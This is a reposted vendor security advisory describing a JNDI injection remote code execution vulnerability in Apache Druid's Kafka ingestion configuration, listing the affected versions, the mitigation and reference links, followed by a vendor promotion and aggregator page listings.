Kafka Configuration Remote Code Execution Vulnerability in Apache Druid (MPS-2023-6623)

News 2023-06-05 20:52:43 views: null

Vulnerability description

Apache Druid is a high-performance data analysis engine.

There was a JNDI injection vulnerability (CVE-2023-25194) in the Kafka Connect module. Recently, security researchers discovered that Apache Druid supports the implementation of loading data from Kafka to meet its exploitation conditions. Attackers can perform JNDI injection attacks by modifying the Kafka connection configuration properties. Then execute arbitrary malicious code on the server side.

By deploying Apache Druid on the intranet, users can enable the identity authentication mechanism to reduce the risk of exploiting vulnerabilities.

Vulnerability name Kafka Configuration Remote Code Execution Vulnerability in Apache Druid
Vulnerability type Improper input validation
Discovery time 2023/4/19
Vulnerability Breadth generally
MPS number MPS-2023-6623
CVE number -
CNVD number -

Sphere of influence

org.apache.druid:druid-core@(-∞, 25.0.0]

Repair plan

Prevent Apache Druid from opening to the Internet and enable the identity authentication mechanism

reference link

https://www.oscs1024.com/hd/MPS-2023-6623

https://mp.weixin.qq.com/s/O2smYIPIRC_fjGdAetWcMQ

https://hackerone.com/reports/1529790

About Murphy Security

Murphy Security is a technology company that provides you with professional software supply chain security management. The core team comes from Baidu, Huawei, Wuyun and other enterprises. The company provides customers with a complete software supply chain security management platform, and provides software with a full life cycle around SBOM Security management, platform capabilities include software component analysis, source security management, container image detection, vulnerability intelligence early warning and commercial software supply chain access assessment and other products. Provide customers with complete control capabilities from supply chain asset identification management, risk detection, security control, and one-key repair.
Open source project: https://github.com/murphysecurity/murphysec/?sf=qbyj

The product can be integrated with various tools in the existing development process at a very low cost, including seamless integration with dozens of tools such as IDE, Gitlab, Bitbucket, Jenkins, Harbor, and Nexus.
Free code security detection tool: https://www.murphysec.com/?sf=qbyj
Free intelligence subscription: https://www.oscs1024.com/cm/?sf=qbyj

insert image description here

Guess you like

Origin blog.csdn.net/murphysec/article/details/130423272
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com